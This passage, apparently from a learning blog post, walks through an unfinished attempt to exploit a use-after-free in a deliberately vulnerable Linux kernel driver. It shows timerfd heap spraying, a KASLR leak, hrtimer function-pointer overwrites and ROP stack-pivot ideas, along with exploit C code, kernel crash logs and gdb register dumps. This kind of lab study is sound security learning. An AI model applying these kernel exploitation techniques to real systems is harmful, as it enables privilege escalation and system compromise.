    fn = timer->function;
    restart = fn(timer);
}

static void __remove_hrtimer(struct hrtimer *timer,
                             struct hrtimer_clock_base *base,
                             u8 newstate, int reprogram)
{
    // between bazillion other stuff
    if (!timerqueue_del(&base->active, &timer->node)) {
        // does something
    }
}

bool timerqueue_del(struct timerqueue_head *head, struct timerqueue_node *node)
{
    WARN_ON_ONCE(RB_EMPTY_NODE(&node->node));
    rb_erase_cached(&node->node, &head->rb_root);
    return !RB_EMPTY_ROOT(&head->rb_root.rb_root);
}

static inline struct rb_node *
rb_erase_cached(struct rb_node *node, struct rb_root_cached *root)
{
    // other stuff
    rb_erase(node, &root->rb_root);
}
__run_hrtimer, the function responsible for calling the hrtimer_restart function, first calls __remove_hrtimer, which ends up calling rb_erase.
At this point, there are a couple of approaches that I could think of:
- Find a Return-Oriented Programming (ROP) gadget that pivots RSP to timerfd_ctx + some_offset.
- Race conditions? Somehow change timerfd_ctx[0] just after rb_erase has returned and before hrtimer_restart is called?
I do not yet understand race conditions well enough in this context to even know if that’s possible. At this point, I went through D3vil’s writeup for HotRod. Interestingly, he sets timerfd_ctx[0] to &timerfd_ctx[0] + some_offset and then loads the value stored at [RDI] into ESP, and that doesn’t seem to crash the kernel. Keep in mind that Supervisor Mode Access Prevention (SMAP) is disabled in that challenge, so a 32-bit stack pointer was enough in that case. The writeup also goes over the usage of userfaultfd for exploiting race conditions reliably, but that seems to be restricted for unprivileged users on newer kernels, so we need to look into Filesystem in Userspace (FUSE) instead. Maybe something I can have a look at next.
This suggests that the timer argument passed to __run_hrtimer below might be taken from timerfd_ctx[0].
static void __hrtimer_run_queues(struct hrtimer_cpu_base *cpu_base, ktime_t now,
                                 unsigned long flags, unsigned int active_mask)
{
    struct hrtimer_clock_base *base;
    unsigned int active = cpu_base->active_bases & active_mask;

    for_each_active_base(base, cpu_base, active) {
        struct timerqueue_node *node;
        ktime_t basenow;

        basenow = ktime_add(now, base->offset);
        while ((node = timerqueue_getnext(&base->active))) {
            struct hrtimer *timer;

            timer = container_of(node, struct hrtimer, node);
            /*
             * The immediate goal for using the softexpires is
             * minimizing wakeups, not running timers at the
             * earliest interrupt after their soft expiration.
             * This allows us to avoid using a Priority Search
             * Tree, which can answer a stabbing query for
             * overlapping intervals and instead use the simple
             * BST we already have.
             * We don't add extra wakeups by delaying timers that
             * are right-of a not yet expired timer, because that
             * timer will have to trigger a wakeup anyway.
             */
            if (basenow < hrtimer_get_softexpires_tv64(timer))
                break;
            __run_hrtimer(cpu_base, base, timer, &basenow, flags);
            if (active_mask == HRTIMER_ACTIVE_SOFT)
                hrtimer_sync_wait_running(cpu_base, flags);
        }
    }
}
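One detail in the loop above is worth isolating: the timer pointer comes out of container_of(), which only subtracts the offset of the node member from the pointer the queue handed back. The user-space sketch below, with a trimmed-down struct named hrtimer_model for illustration, shows that for a first member the result is simply the same address. Read this way, the pointer passed to __run_hrtimer is where the node lives according to the tree, not the value stored in the object's first qword; that is my reading of the quoted code rather than something verified in a debugger.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Minimal user-space version of the kernel's container_of(). */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

struct rb_node {
    unsigned long __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
};

struct timerqueue_node {
    struct rb_node node;
    int64_t expires;
};

/* Trimmed-down stand-in for struct hrtimer (illustration only). */
struct hrtimer_model {
    struct timerqueue_node node;
    int64_t _softexpires;
    void *function;
};

/* Recovers the enclosing timer from a pointer to its queue node. */
struct hrtimer_model *timer_from_node(struct timerqueue_node *n)
{
    return container_of(n, struct hrtimer_model, node);
}
```

Because the offset of node is zero, timer_from_node(&t.node) returns &t unchanged.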
Try #4
Well, we could check the source code to see if that’s what happens, but (skill issue) we can also just test it. Let’s set timerfd_ctx[0] to &timerfd_ctx[0]+100. This should give us a page fault for trying to execute &timerfd_ctx[0]+100 at RIP with our current ROP gadget.
./exploit
uaf_buf: 0x19cd840
base_address: 0xffffffff9bc00000
timerfd_tmrproc: 0xffffffff9bee6a20
gadget1: 0xffffffff9be41107
previous_buf: 0x1
[ 2.558530] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[ 2.560838] BUG: kernel NULL pointer dereference, address: 0000000000000074
[ 2.561136] #PF: supervisor read access in kernel mode
[ 2.561279] #PF: error_code(0x0000) - not-present page
[ 2.561463] PGD 1c04067 P4D 1bfd067 PUD 1c18067 PMD 0
[ 2.562034] CPU: 0 PID: 65 Comm: exploit Tainted: G O 6.6.16 #1
[ 2.562239] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 2.562550] RIP: 0010:rb_erase+0x84/0x3a0
[ 2.562947] Code: 89 16 48 8b 57 10 48 89 50 10 48 8b 32 83 e6 01 4c 01 d6 48 89 32 48 8b 17 48 83 fa 03 0f 86 82 00 00 00 48 89 d6 48 83 e6 fc <48> 3b 7e 10 0f 84 e4 00 00 00 48 89 46 08 4d 85 c9 74 0f 48 83 c1
[ 2.563416] RSP: 0018:ff623b9d00003f10 EFLAGS: 00010002
[ 2.563559] RAX: ff17ea7401987128 RBX: ff17ea7401bf4d00 RCX: ff17ea7401987128
[ 2.563795] RDX: 0000000000000065 RSI: 0000000000000064 RDI: ff17ea7401bf4d00
[ 2.563975] RBP: ff17ea740761f220 R08: ff17ea740761f220 R09: 0000000000000000
[ 2.564142] R10: ff17ea7401987128 R11: ff623b9d00003ff8 R12: 0000000000000006
[ 2.564308] R13: ff17ea740761f220 R14: ff17ea7401bf4d00 R15: ff17ea740761f200
[ 2.564524] FS: 00000000019cc3c0(0000) GS:ff17ea7407600000(0000) knlGS:0000000000000000
[ 2.564799] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.564986] CR2: 0000000000000074 CR3: 0000000001c10000 CR4: 0000000000751ef0
[ 2.565247] PKRU: 55555554
[ 2.565386] Call Trace:
[ 2.566143] <IRQ>
[ 2.566406] ? __die+0x1e/0x60
[ 2.566549] ? page_fault_oops+0x17c/0x470
[ 2.566697] ? exc_page_fault+0x6b/0x150
[ 2.566782] ? asm_exc_page_fault+0x26/0x30
[ 2.566895] ? rb_erase+0x84/0x3a0
[ 2.566989] timerqueue_del+0x2e/0x50
[ 2.567120] __hrtimer_run_queues+0xdf/0x2a0
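That is not what happens: the kernel faults inside rb_erase before our gadget is ever reached. Two details in the log stand out. RDX holds 0x65 and the faulting address is 0x74, and the exploit printed previous_buf: 0x1, which suggests the value that actually landed in timerfd_ctx[0] was 0x1 + 100 rather than a heap pointer plus 100. Interestingly, this is a page fault, which is the kind of event userfaultfd is built around, so could it end up handling this situation as well? I really have no clue currently and need to dig further.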
I still tried to do something different, just to replicate the approach from the above writeup: get the leak from the first timer, deallocate it using close(timer_fd), then try to get another timerfd_ctx allocated. But no matter how hard I tried, the second timerfd_ctx never got allocated into my freed heap with the code below, so 0xdeadbeefdeadbe00 was never called.
int vuln_fd = open("/dev/vuln", O_RDWR);
char *uaf_buf = malloc(alloc_size);  // assume not failed
char *uaf_buf2 = malloc(alloc_size); // assume not failed
memset(uaf_buf2, 0, alloc_size);
struct itimerspec timer_spec = {{0, 0}, {10, 0}};
int timer_fd, timer_fds[20];
int spray_count = 0;
if (ioctl(vuln_fd, ALLOC, &alloc_size) != 0) {
    // assume not failed to reduce text
}
if (ioctl(vuln_fd, FREE) != 0) {
    // assume not failed to reduce text
}
// allocation 1
timer_fd = timerfd_create(CLOCK_REALTIME, 0);
timerfd_settime(timer_fd, 0, &timer_spec, 0);
close(timer_fd);
sleep(1);
if (ioctl(vuln_fd, USE_READ, uaf_buf) != 0) {
    perror("USE_READ failed");
    free(uaf_buf);
    return -1; // do not keep using the freed buffer
}
// allocation 2
for (; spray_count < 20; spray_count++) {
    timer_fds[spray_count] = timerfd_create(CLOCK_REALTIME, 0);
}
for (int i = 0; i < spray_count; i++) {
    timerfd_settime(timer_fds[i], 0, &timer_spec, NULL);
}
sleep(1);
uint64_t *leak = (uint64_t *)uaf_buf;
uint64_t timerfd_tmrproc = leak[5];
base_kernel_address = timerfd_tmrproc - TIMERFD_TMRPROC_OFFSET;
leak[5] = 0xdeadbeefdeadbe00; // marker value in place of a gadget address
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
    printf("USE_WRITE failed\n");
    goto cleanup;
}
wait_for_enter();
However, if you go over Will’s Root’s HotRod writeup, he uses xchg_eax_esp for a stack pivot, something I really did not understand. Where and how is he controlling $eax?
Looking at the register values when our target function is called, $rax seems to possibly hold a pointer to the heap, but to where?
Breakpoint 2, 0xffffffff88e41107 in ?? ()
(gdb) i r
rax 0xff19fc968761f701 -64742996173523199
rbx 0xffffffff88e41107 -1998319353
rcx 0x1 1
rdx 0x0 0
rsi 0x2 2
rdi 0xff19fc9681c02900 -64742996268013312
rbp 0xff19fc968761f1c0 0xff19fc968761f1c0
rsp 0xff4ea116c0003f28 0xff4ea116c0003f28
r8 0xff19fc968761f220 -64742996173524448
r9 0x0 0
r10 0x0 0
r11 0xff4ea116c0003ff8 -49925426771902472
r12 0x2 2
r13 0xff19fc968761f220 -64742996173524448
r14 0xff19fc9681c02900 -64742996268013312
r15 0xff19fc968761f200 -64742996173524480
rip 0xffffffff88e41107 0xffffffff88e41107
eflags 0x82 [ IOPL=0 SF ]
There, the pivot_target in user space is set to:
// mmap page for rop chain
unsigned long pivot_target = xchg_eax_esp & 0xffffffff;
unsigned long *fake_stack = mmap(pivot_target & 0xfffff000, 0x50000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED|MAP_POPULATE, 0, 0);
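One possible reading of that snippet, offered as an assumption rather than a confirmed explanation: on x86-64 an instruction with 32-bit operands zero-extends its result, so after xchg eax, esp the stack pointer holds only the low 32 bits of whatever was in RAX. The snippet maps user memory around the low 32 bits of the gadget's own address, which would be the landing spot if RAX held the gadget address when the gadget runs. In the register dump above it is RBX, not RAX, that holds the gadget address, so this may not carry over to this kernel. The arithmetic itself is sketched below, using the pivot gadget address from this post purely as a sample number.

```c
#include <assert.h>
#include <stdint.h>

/* Low 32 bits of an address: what RSP would hold after `xchg eax, esp`
 * if RAX contained `addr` (32-bit writes zero-extend to 64 bits). */
uint64_t pivot_target_of(uint64_t addr)
{
    return addr & 0xffffffffULL;
}

/* Page-aligned base used for the mmap() call in the quoted snippet. */
uint64_t page_base_of(uint64_t pivot_target)
{
    return pivot_target & 0xfffff000ULL;
}
```

For the sample address 0xffffffff81241107 this gives a pivot target of 0x81241107 inside a mapping that starts at 0x81241000, which is a user-space address and therefore only reachable from kernel mode when SMAP is off.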
Do let me know if you understand the above better.
What’s next?
I will probably be having a look at FUSE (Filesystem in Userspace) next, or at why their exploit worked, but it might take some time to do that and write a blog post about it, so stay tuned I guess.